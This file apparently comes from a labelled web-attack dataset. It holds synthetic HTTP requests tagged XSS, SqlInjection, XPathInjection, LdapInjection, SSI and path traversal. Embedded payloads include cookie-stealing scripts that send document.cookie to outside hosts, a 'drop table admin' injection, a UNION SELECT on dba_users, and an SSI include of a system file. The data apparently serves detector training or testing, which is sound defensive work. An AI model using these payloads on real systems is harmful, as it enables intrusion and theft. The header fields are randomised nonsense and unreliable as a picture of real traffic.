GET /enVI.z/rn/Ssc1gZhtaccesaOselectWbAF/sserakviabsuAlqtt/Yntwrlhicneycme2gS/mngtreot3E2.swf?ts6ntfbodgN=t%24&rQLGzWuT=+document&n7epiiasioe4=30615725&so7sndi1=%3Cinput++type++%3D%22image%22+++dynsrc%3D+%22javascript%3A++++%5Balert%28%27ddmia%27%29%3B%5D++%22%3E&andhh8q7ot6frdi=218140&ttyqe2migdvn=1556&n4rjsitfsld=32063 HTTP/1.1
Host: 121.123.244.67
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, big5;q=0.8, euc-kr;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: I1e-oeircl3;q=0.9
Cache-Control: no-store
Client-ip: 180.109.10.125
Cookie: eaei4cTn0oeve=643;etm6op9bu=2101234359;a1alsawtcoo=sX-;rln=339
Cookie2: $Version="45"
Date: Mon, 22 Mar 04 12:44:59 CET
ETag: "jeUvSwK29ptQR8mMDwe"
Expect: bltUcf=Sn6ay
From: 51p19@sa8nrs7ro.biz
If-Modified-Since: Thu, 22 Feb 07 12:07:11 CET
If-Unmodified-Since: Sun, 09 May 04 08:27:29 CET
If-Match: "K-8aXbunMv47twaM.PZ"
If-None-Match: *
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 320
MIME-Version: 2.0
Pragma: moau99l=e
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: Basic bGd2YTpjNWl3Z3I=
Range: -016,1-,67332-47295
Referer: /sr8rlou.cfm
TE: deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.4 (Machintosh; U; Mac OS X 4.7; is-e4; rv:8.5.0) Gecko/93869631
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: lben/7.2 www.u9eaCh.tiff:22602
Transfer-Encoding: gzip
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 131 246.175.42.21 "cjoft" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47172
Start - Id: 47109
class: XSS
GET /q7cTfKW_US/eSZ3UZ2g89PznBGIm/tae9r7nolw/jJzlC2XWTASTtkEfN./eP4BCdeYyfnH71F/bw@hgo-REH30I/sp6UdAPIZRrblfNJ16/rScqwXSY/cann/sEl.cfm?hr=%3Ca++++href%3D%22++javas%26%2399%3Bript%26%2335%3B%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.etetle.com%2Fcgi-bin%2Ftant.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&uHtsoui=ha&higrznpdbqinUe=eSe%408+%27Th+exec&libe=teBhoE&9l=r1%5Ddyt3e7%2BagG8openU&jynO=tnevtsor HTTP/1.0
Host: www.pcpn4eY.gov:80
Connection: gjho8nui
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: wwae-he
Cache-Control: no-store
Client-ip: 204.81.116.80
Cookie: tet2SGw=t3-28-x7ToX;dhdscieeF2rt=thh
Cookie2: $Version="1"
Date: Sat, 20 Mar 10 21:12:49 GMT
ETag: "vnU_@_vYPqXRe-uJcMr"
Expect: 100-continue
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Sat, 11 Apr 09 06:35:13 GMT
If-Unmodified-Since: Mon, 17 Nov 08 17:17:41 CET
If-Match: "rkz2rxWR7@GyKnYNtt"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 7.3
Pragma: so='nr2r'
Proxy-Authorization: NTLM bXI4YTU4YmF1b3RvaW90YXlMNTNubXFlZmVsYXNQcmVtY29hdHJpdEU=
Authorization: Basic ZXRpdHg1ZWg6ZXhUZXM=
Range: 74-7756,9-
Referer: http://irthc.biz/koiy0nL/a7hwn.sh
TE: deflate;q=0.4
Trailer: Connection
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 5.7; a7-hL; rv:6.5.0) Gecko/69732295
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2605x6191
Via: snlss/2.1 243.136.217.68
Transfer-Encoding: identity
Upgrade: mnyt/9.5
Warning: 241 140.186.56.188 "eynAOe7ebztnrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47109
Start - Id: 48426
class: XPathInjection
GET /nkeyvJ2YylES/QwG/hyrsiecvatenusi0jrti/tanstexokooegsromv/qk/eP8yT/styleEiMY1H.jsp? HTTP/1.0
Host: 226.118.179.77
Connection: sweL
Accept: image/png;q=0.4
Accept-Charset: windows-1250;q=0.5, windows-1251;q=0.4, windows-1251;q=0.9
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 118.241.235.123
Cookie: Ite5enu=i;nlbapn3i=0wtEetD'  or   se/gep/child::node()[processing-instruction()=821]    or    'hg'    =    ';Xnu5oEb=eumwsy1rRorGarAecn;ogiTla= 
Cookie2: $Version="50"
Date: Thu, 26 Nov 09 18:19:03 UTC
ETag: W/"MZ.Sx2ldffMvzMM"
If-Modified-Since: Mon, 03 May 04 01:33:38 UTC
If-Unmodified-Since: Wed, 16 Apr 08 10:15:39 GMT
If-Match: *
If-None-Match: "ploQN8wZhkg.XtK"
If-Range: Sat, 26 Dec 09 18:37:17 UTC
Max-Forwards: 12
MIME-Version: 7.3
Pragma: pleorbe1=gl
Authorization: Basic VU9udTg6ZXA0aXNmdGk=
Range: 32-,764603-,-5924
Referer: /Umhp/Iatlyi.png
TE: trailers,deflate;q=0.9,gzip;q=0.4
Trailer: Host
User-Agent: sWJ8l.uqmy http://www.2i0nefdl.fr
UA-Color: color32
UA-Pixels: 3994x194
Via: FTP/3.0 www.09tE.js, HTTP/5.3 234.253.68.103
X-Forwarded-For: 110.20.49.195
X-Serial-Number: 2509612458
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48426
Start - Id: 48473
class: XPathInjection
GET /itaETf6RQ2POKa/iMVOT7y6/andfidNg/v@Uzi/sieTG8iy933m5YX6hrD/rEYcul9woeXIAJCG62fU/e2qKKdK/sOi3mp.php?asbhArmn=37&ir=40&oyJtl9haet=7unflptbxeefkef&2sock_streamewM-u=i&RSEWB=acexech&m4aop=ctneA&ctr6hsTeo=8&nmalBekvag=ntt6nGvfkoW7&andwnsfvurDf=aew3jdu&oe=xmloptpxt&trvevkr=Oh%3Cs&oTa3ptom9kFyt5e=47497045&cmy=rcpoapprocessing-instructionnhrnh HTTP/1.0
Host: 182.123.75.63
Connection: ircea6
Accept: text/plain;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, identity
Accept-Language: aaritil-hpiNtW, il-8thif3;q=0.4, aflcmfet-dliis0h;q=0.2, pn7dd-uEaxa, Led-y
Cache-Control: niu='tret'
Client-ip: 68.49.177.93
Cookie: 79fhRAM=osanafg' or   1<  ap7o/fr/a/child::text()[position()=252]     or 'dmtutg'   =   ';3J_zO=el9ptanedivlna<its;flss=ivZLoOd-aU_;yiviolo=mrOasOuee;ahAmTh=8847448428;0jec9oSSxy=2
Date: Wed, 04 Apr 07 02:07:05 GMT
Expect: 100-continue
If-Modified-Since: Sun, 21 Aug 05 12:08:58 CET
If-Unmodified-Since: Thu, 17 Aug 06 14:44:34 GMT
If-Match: *
If-None-Match: "5bxqQtC0VEVQnscd"
If-Range: *
Max-Forwards: 47
Pragma: no-cache
Authorization: Basic dDBrcGh0REI6dW10cnNhYg==
Referer: /nmun8au/dmooL9hb.cgi
User-Agent: 0veead354/1.1.5.8.2
Via: FTP/8.6 www.ojejf.htm, HTTP/8.0 194.149.179.229:991, 3.6 www.anl1.htm
Warning: 970 www.loschtan.shtml:1 "dISrElrc" "Sat, 01 Dec 07 05:56:12 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48473
Start - Id: 38085
class: LdapInjection
GET /nn/tyYwsbIg@y/sohtetaEeCteEenobdmr/rH-JPA2L_0p10t7dk29/Feef1tafd8eede/%unsoYGopen/lcKfyzZoo/mLa6Qs3J.php?ssn=H0oAy%24b+a&ssrea7t8frreb=2Dg78Up3.&ifa24=1281822&urmhndehCsio9k=eheiframeacceptcka&Di6sY2J_=+e%5Da&3eB9aihajeosES=tM%40OtkA-ZjEa&McQ7q2bgsoundsE=4741180&ue0a_Gwhere=%29++++%28+%7C%28displayName%3Dhad*%29%28name++++%3D++had*++++%29%28+mail%3Dhad*++%29&ehjhiitAen=26330813&idqn4eacu=ownconnectsitu&lhszhntmeaj=slhed4&rhfe=8704&tWr9ikrhej0s4d=nennsObrd1 HTTP/1.1
Host: 248.182.181.151
Connection: dein5y
Accept: */*
Accept-Charset: x-mac-korean, x-mac-japanese, us-ascii, x-mac-turkish;q=0.1
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 111.152.191.252
Cookie: ajaie8didflf0tl=Tev5e;dow=KsO;8ggnet1Dcnecfc=36457335
Cookie2: $Version="74"
Date: Wed, 13 Sep 06 22:38:53 UTC
ETag: W/"3_efAi020xTGsJzsTVz"
Expect: 100-continue
From: 6boleoo@ai5nodlHti.be
If-Modified-Since: Mon, 01 May 06 22:33:49 GMT
If-Unmodified-Since: Sat, 05 Jun 04 20:20:03 UTC
If-Match: *
If-None-Match: "NtTBkiQr7.qr_qJGPp"
If-Range: *
Max-Forwards: 415
MIME-Version: 7.3
Pragma: Uj=qpsp
Proxy-Authorization: Basic V3I2dGV5dzppZXR0ZW5pYw==
Authorization: Digest algorithm=MD5-sess
Range: 77-,76-
Referer: /4ataI/sryo/eJicsl/0dyoa/rgeneIe2.cgi
TE: gzip
Trailer: Pragma
User-Agent: eBC0Aum http://www.kjtGseal.uk
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3700x2595
Via: FTP/2.9 www.eeFdoet.js:021, aWnpa/0.5 www.hmoU0.js, 8.5 61.28.97.229
Transfer-Encoding: 4nis; ohirt=itsrh2
Upgrade: sS7i/3.2, haaoxa/5.4, fair/8.2
Warning: 290 www.isci.css:805 "iIseaaalda5ig" "Wed, 15 Oct 08 18:13:14 GMT"
X-Forwarded-For: 152.42.151.28
X-Serial-Number: 814494240740
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38085
Start - Id: 48288
class: XSS
POST /nodeFkbinL/fKo7rSRC11RCYwKjM67w/cry2ae0spri/rdHaCdmt/rheb7u4a1l/GmpsYL.aspx? HTTP/1.0
Content-Length: 258
Content-Language: etekstoM
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Host: 160.48.201.252:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: gzip
Cookie: 8nin=e6qeuor;3exmvlNBD1=<body   onload =  "  [window.open('http://169.146.231.163/ngniro.cfm'+document.cookie);]     " >;x3AhavingldOoG=aueg;rru0=202;thdxee=arhadstm;rSae=8
Date: Mon, 23 Nov 09 05:15:53 UTC
If-Unmodified-Since: Wed, 24 Oct 07 15:35:55 UTC
Authorization: xeti d1tk=esneec
Referer: /7tsnly/33reDan/Ebve/e5tthci.asp
TE: gzip
User-Agent: Mozilla/0.1 (compatible; olhe7A; Open BSD i586; AsifsTfbmn; cgt3; gueA1t6)
Via: 9.0 15.112.181.237, 8.8 www.beeet9c.jpg, 4.9 www.alhnsUut.jpg
Transfer-Encoding: identity
Upgrade: 4rr5/6.0

dmee=9063095&lj5Rnltlp4b='eh y&Aeorsl3mlboel=39&lu4rosio7ader=sq&TIKLbv0dKH=eono$eOg>3x&qiyEd=orn0m&cjTR=;rmfResnt&tim=59160520&HNUI=7185118005&SFxanogvbveTru=?c) 9&@RalQ_PQO4=ln&4oqNHi=nytt%8riybinypqiioscriptlyr&isEseEegYtdEm2i=lcy\nph-aIRe

End - Id: 48288
Start - Id: 42677
class: SqlInjection
GET /m-q8ZO9tOLOiu/lQI9yBSRnSr6krbnf/c3/sfGGS5tG/n6G-wm0/1mailgC/aX/mmroatIh9i9shjkjn/egottihonofM/hDZY72215pDnwVt.htm?debto5on1k=52032712&m7oksrhd=dvalulzolr3mswdnoq&binHtmpPR2=75559421&z8mailA4UUnull_WZS=%27+or+++++id++++in++++%28+++++select+++++*+from+++++user_db+++++%29&buwat=aOeiq&rpq9aserno5e=lCVh8f HTTP/1.1
Host: 59.221.185.231
Connection: xcsfAo
Accept: image/*, image/jpeg;q=0.8, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, identity
Accept-Language: aeav1aje-xja8;q=0.6, tir2-1, wN-t;q=0.5
Cache-Control: ieh='zn'
Cookie: ul7nt6oshgnoo=ax5wolt9stfsfeessS;7nausEldontoitw=enimeisumc7k1;tdsy2Qob0=936
Date: Mon, 27 Nov 06 05:08:39 UTC
ETag: W/"O4511sH@af4c9fN"
From: keNoy@ouhsnitwek.de
If-Modified-Since: Mon, 18 Jun 07 19:10:31 CET
If-Unmodified-Since: Sun, 17 Apr 05 03:23:00 GMT
If-Match: "eW-wzrCDIYGIzFORTWOn"
If-None-Match: *
If-Range: Wed, 07 Jan 09 09:50:36 UTC
Max-Forwards: 34
Pragma: no-cache
Authorization: targsi lneears=nBdenc
Range: 1-0,751199-8
Referer: /otjwp8/eoapario/sipbd/hlFale/ptde6.sh
TE: chunked;q=0.2
User-Agent: eIKsOfL6QW http://www.oqnsh.fr
Transfer-Encoding: identity
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42677
Start - Id: 41394
class: SqlInjection
PUT /absmkzoeie1sn/semRoyllttOdoan/eH-I02_5jQFfRqPPTJQP/tmpX0orm3nullPrkj/ahirsf3nna1.js? HTTP/1.0
Content-Length: 108
Content-Language: gztpllEs,oyo,lsjoeari
Content-Encoding: compress
Content-Location: /aaaao/m0ur.mspx
Content-MD5: bGVuVHJqdFRybXJ0bmkycQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Jun 07 09:07:08 GMT
Last-Modified: Thu, 03 Feb 05 20:45:59 GMT
Host: 157.61.136.197
Connection: close
Accept: audio/*;q=0.8, video/*;q=0.2, video/*;q=0.8
Accept-Charset: windows-1255;q=0.0, euc-tw;q=0.9, iso-2022-kr, x-mac-chinesesimp, x-mac-arabic;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 253.80.116.112
Cookie: ihnte1afytgnrlH=rygo@yvC55J;qNsu4ramn=76182;DlovanzceGmneia=8
Cookie2: $Version="59"
Date: Fri, 30 Jul 04 07:37:25 GMT
ETag: "lIiRlIPKte_9Hpgpj"
Expect: 5ERmu=ncdsee
From: xttrniQd@tSeAtnO.net
If-Modified-Since: Sun, 12 Apr 09 17:51:47 GMT
If-Unmodified-Since: Fri, 06 Nov 09 18:59:22 CET
If-Match: *
If-None-Match: "tG_FF.Vbh0_K-UJX"
If-Range: Mon, 30 May 05 24:56:27 CET
Max-Forwards: 5062
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: NTLM dm9sZk1jT250TGh3c3pveWlSaWRuYmV0YnJzRnJyOXJ0bGFlYXQ0
Range: 711-
Referer: http://aeasOs.gov/7ie4eDy/iaon.rar
TE: chunked;q=0.2
Trailer: Upgrade
User-Agent: orln7erorzrrbr
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 1178x5140
Via: 2.1 243.39.231.192, mdvry6/6.3 www.eHe4.tiff
Transfer-Encoding: identity
Upgrade: vtba/8.2, hnytoe/8.1, aWaG0t/9.1, Ins/7.8, icoct/4.7
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

M2ftpa=LtntT+t Tt&qR=|h &tgNDd=4&ratabnrtMjlj=1&midscqbche=92609383&odh85s=';     drop  table  admin

End - Id: 41394
Start - Id: 48932
class: XPathInjection
GET /3Yb0zm4HJpqLlKt/n-3fgp/eay/ootnmTSc4ioola/sPhh6B@k3Iq8rAWViRR/goeUavzEav.js?le6=2906226639&6etsof=sOthhrsye&Rbctpdn9dahrh=olew%2Fo%28j9ol%27pe%3Cn&isdImolud5aahc=nNesj&nTdiv-0IgvCixtermI=1596+++++or+++1%3C+ecENc%2F7pmee%2F092%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D569%5D+++++or+236%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: 124.175.20.246
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 174.124.242.131
Cookie: oeeteownassIk=3101573;hrFruP=\libE;or7ereh=07818;tEXevalyr=lr Fbetween;dHC6=8670801387;lih2=eLO
Cookie2: $Version="7"
Date: Sun, 26 Dec 04 16:23:10 CET
ETag: "pu9Z2wUyy65gZhc"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Tue, 29 Jun 04 18:00:09 CET
If-Unmodified-Since: Fri, 27 Aug 04 17:59:05 CET
If-Match: "O7Sn0543aQHWUI_e9Dv"
If-None-Match: *
If-Range: "2LqXz-6PTMdWUtFd2M"
Max-Forwards: 3
MIME-Version: 6.7
Pragma: plii6yd='f'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Digest opaque="wasllza"
Range: 326-470558,-0121
Referer: http://www.uOabm.org/cdjfE/nnktdeg/fahtq.zip
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 5.5; 32-t2; rv:6.0.8) Gecko/02365000
UA-CPU: StrongARM
UA-Disp: 6851,715,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: FTP/0.4 www.aycmt5e.js
Transfer-Encoding: identity
Upgrade: tHifu/1.7
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 6293000915488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48932
Start - Id: 40507
class: SSI
GET /pnie59eylcivT7/qyaaarslcdsassigoTcz/r5nqJruak/R5rD2winnt2AA/EWb7bgsoundaR3Kunion/nutdnmsm/mp/eurdFcnootS/5q-w/Rlaeesisna.php3?s1ioop=yEkYTvJ&888SQk_nc1mB=tgnidwF+utha&wrotsHa=eNyYPMlCE&0ergnDea=3698&ecoa=9209&4iIfy3=920706&c422KE5uH4kV=r%40O&sEEcctqi=u%28includeatcTywherep%2B&Ca=ejeCK9V&wcdV=%3C%21--+++++%23include++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&omhdo=9885255943&hmhlygei6tajr=echo9nhaea&a5rct=240633&mc6uioilhgy3=O&u1id0ridsve=qWxaXK HTTP/1.0
Host: 182.146.133.108
Connection: taCv
Accept: */*
Accept-Charset: us-ascii;q=0.1, x-mac-turkish
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 68.175.116.43
Cookie: soo=olllO8 rrtveiH;Dae5fvqacFds=341;61EeZpassthrun7tX=q;9quihPa=eDomeRk3cgMtrtkf;nhnmurnHdyew=yxrNj;gi=tREiDR3.AUb
Cookie2: $Version="147"
Date: Thu, 06 Mar 08 05:44:23 UTC
ETag: W/"k5QWemeMMlDKpQQIF@"
Expect: 100-continue
From: dtmxe@ioclgro.it
If-Modified-Since: Wed, 24 Aug 05 15:30:50 UTC
If-Unmodified-Since: Wed, 15 Mar 06 14:44:04 CET
If-Match: "3ZJL0iJ5JJ4q7e.vGGzR"
If-None-Match: *
If-Range: "3jSV2W8X@hnqc1@tkw"
Max-Forwards: 54
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM RWV0b1dIcmVlbkZoZnJyc3RwRGFSM3JobmN1ZW54aUFlbml4NTZodE9waWw=
Authorization: rloeC ro5fte9s=nfeswo
Range: 049-19497,328865-,-538
Referer: /yu0i6ooo/eRiyah.html
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Otfoh (dKF.rcw; oCk5JGyR; v8nPSCFq; cTGEnj928; oAQW_VqrgB)
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 278x2627
Via: 2.4 50.116.99.173, 8.0 243.164.34.32, FTP/3.6 239.102.9.169
Transfer-Encoding: identity
Upgrade: stscth/0.9, onhEnx/5.9, pp0sG/4.5, we6h/6.0, dwhd/5.7
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 7235239060397255727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40507
Start - Id: 42506
class: SqlInjection
GET /iOzm/sqY0Vk9pr00/bhjaogjahgn3/ca5MMaIbv7Lq.mdb?1Ydidsot=44&einu7oyrnamoKgr=aqr%27%2F**%2FUNION%2F**%2FSELECT%2F**%2FehrhodeiqL%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2FtMP%2F**%2Flike%2F**%2F%27%2525 HTTP/1.0
Host: www.coteh.org
Connection: keep-alive
Accept: application/rtf, audio/basic, text/*
Accept-Charset: gb2312;q=0.6, x-mac-arabic;q=0.2
Accept-Encoding: *
Accept-Language: z-jsejn;q=0.7
Cache-Control: only-if-cached
Client-ip: 59.62.46.157
Cookie: drr=tsde;io=2fe o;wFC0httpse3= tgi6pipr;XexecU_=alnhtndttOECnias;KopassthruUpassthruk@c0=au;szelraoTrry4=667
Cookie2: $Version="85"
Date: Mon, 14 Aug 06 23:54:06 UTC
ETag: W/"Meb@PuEcS0MSg5w"
Expect: meehtt=aoeIha
From: be38Ged@6e9snto.ch
If-Modified-Since: Wed, 22 Dec 04 20:34:49 CET
If-Unmodified-Since: Mon, 28 Sep 09 21:27:58 UTC
If-Match: "L2Vij3R8ukgc0zgU"
If-None-Match: "IkS3r3@wyXvNo064W"
If-Range: Tue, 02 Sep 08 14:23:54 GMT
Max-Forwards: 748
MIME-Version: 8.8
Pragma: 0=Yenjnc
Proxy-Authorization: Basic d2xpbjplbmsxaHk2bQ==
Authorization: Digest uri=http://noqluar.com/ntodeig/dth6.jpg
Range: 16802-
Referer: http://unaldand.st/oapaeoe/nxjiia.jpg
TE: gzip;q=0.7,trailers
Trailer: Max-Forwards
User-Agent: ilAoevbgxs (fcQDhJlx)
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 733x829
Via: 5.2 www.ocpD.jpeg:2975
Transfer-Encoding: gzip
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 504 127.15.72.187:71097 "tehsu6o03" "Sat, 20 Aug 05 24:15:38 GMT"
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42506
Start - Id: 49028
class: XPathInjection
GET /aRmoZaKPJE5-emLKcQBt/dropHPJ3RBBRphpW6sJ/aDhXSljTLjRZ8SI-Xlz./WUebzxFidicoionah0e.asp?1ecenasufoe=oo8vr%27+++or++++1%3C+++++p%2F0r%2Ft6te%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D85%5D+++or+++++%27u7lehp%27++%3D%27&qetmArT=%29o&cladq=va3 HTTP/1.0
Host: www.leyireb.biz:80
Connection: uvcejtmu
Accept: text/plain, image/gif;q=0.3, text/*;q=0.1
Accept-Charset: shift_jis;q=0.3, iso-8859-8-i, x-mac-arabic;q=0.8, windows-1252, x-mac-cyrillic
Accept-Encoding: compress;q=0.3, compress;q=0.3
Accept-Language: *
Cache-Control: min-fresh=1
Client-ip: 172.221.103.89
Cookie: YlAe=e1aernratohami;hiic=hW.0d@gw;ar=52371;O9abpidxEaRApAz=8witrso;5gVwPxMX4=43503
Cookie2: $Version="88"
Date: Mon, 30 Oct 06 06:29:56 CET
ETag: W/"NDEJs@hP3l-miMF7KO"
Expect: asneEri=oe6du;Oioao=uoxeyx
From: oc6etY@0uezaiml.cz
If-Modified-Since: Sun, 24 Feb 08 15:12:50 UTC
If-Unmodified-Since: Fri, 16 Jul 04 18:54:37 CET
If-Match: "sTKGR4P0AoW3qO_Opg"
If-None-Match: *
If-Range: *
Max-Forwards: 34
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic MVRudG9zYjpnb2VzbmU=
Authorization: Basic ZDZpVHJudDpkcjN0aWluZg==
Range: -31
Referer: http://www.s1th.cz/easah/thati/tlryenti/a2faje.asmx
TE: deflate,chunked,trailers
Trailer: Pragma
User-Agent: jncQNEwqR6 http://www.awlcfned.be
UA-CPU: 68000
UA-Disp: 913,4010,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1840x9062
Via: 2.2 www.Ey6achcs.jpeg, HTTP/7.1 www.phar.jpeg, eerno/7.5 www.aToyah.shtml
Transfer-Encoding: compress
Upgrade: sfltc/9.5, Llja/5.6
Warning: 832 www.aeh0a9i.js:7 "omte8QStoehr7LPtw" 
X-Forwarded-For: 25.112.255.42
X-Serial-Number: 00114
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49028
Start - Id: 37974
class: LdapInjection
GET /cmcNTIN@eJqsjlU/rIz6TB79nBtBGGcg/lseexKnM0VB4IpL4h/xieontfKtitb57psitl/nno/GvV/opEaCwHpeVnWUXsDE/t85aXiuhehexirsINs9/93_L-connecte8yon/oaqdtjoiil/pnmQ7v9KW6.aspx?egguahb=iI7%29%28+%7C++%28temfa%3D*%29&cmr5w=deletepmre%27n+nsA&CFr=rsieimg&xiaeneTnS=rboaduf HTTP/1.1
Host: www.gR8Ii.com
Connection: hrrhrt
Accept: video/*;q=0.1, audio/*
Accept-Charset: windows-1254;q=0.5, us-ascii;q=0.3, x-mac-greek;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 212.223.27.223
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="5"
Date: Tue, 04 Dec 07 12:31:40 CET
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Tue, 13 Jan 04 04:26:08 UTC
If-Match: *
If-None-Match: *
If-Range: "LZEhfgPNFK3uizGD"
Max-Forwards: 3
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest uri=/rzqu/hgeajer.gif
Range: 4893-,-7197
Referer: /lrlkao/anssar.tiff
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: neEhbi (tHkbkese; a2WtBvyC; rifBkKw_)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8848x2681
Via: FTP/7.3 187.106.37.213, 3.6 www.eolDs.shtml:1
Transfer-Encoding: tNlu
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37974
Start - Id: 45141
class: PathTransversal
GET ////? HTTP/1.0
Host: 154.21.217.45
Connection: keep-alive
Accept: text/*;q=0.7, text/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: aen='sqinh'
Client-ip: 231.243.192.196
Cookie: f6na1hsEsC=0411822;gid3rli5=wo
Date: Mon, 11 May 09 07:29:07 GMT
ETag: W/"2-VSCt6JUMLki@ua2kNG"
Expect: daw7irko
If-Modified-Since: Thu, 09 Mar 06 06:29:40 CET
If-Range: "0gcNNxmEKdNOKPe"
Proxy-Authorization: Basic aHRheTpyaWlo
Authorization: rAoes raB3e=rmZse
Referer: http://Rmsre.com/eobd3as/hosc/4hsCli.sh
User-Agent: Mozilla/9.8 (Windows; U; Win 9x 4.2; 1r-8r; rv:2.6.6) Gecko/86985216
Upgrade: rihnni/3.3, qrt5E/4.2, tei5h/7.5, aev/2.9
----: ----------------------------

null

End - Id: 45141
Start - Id: 49450
class: XPathInjection
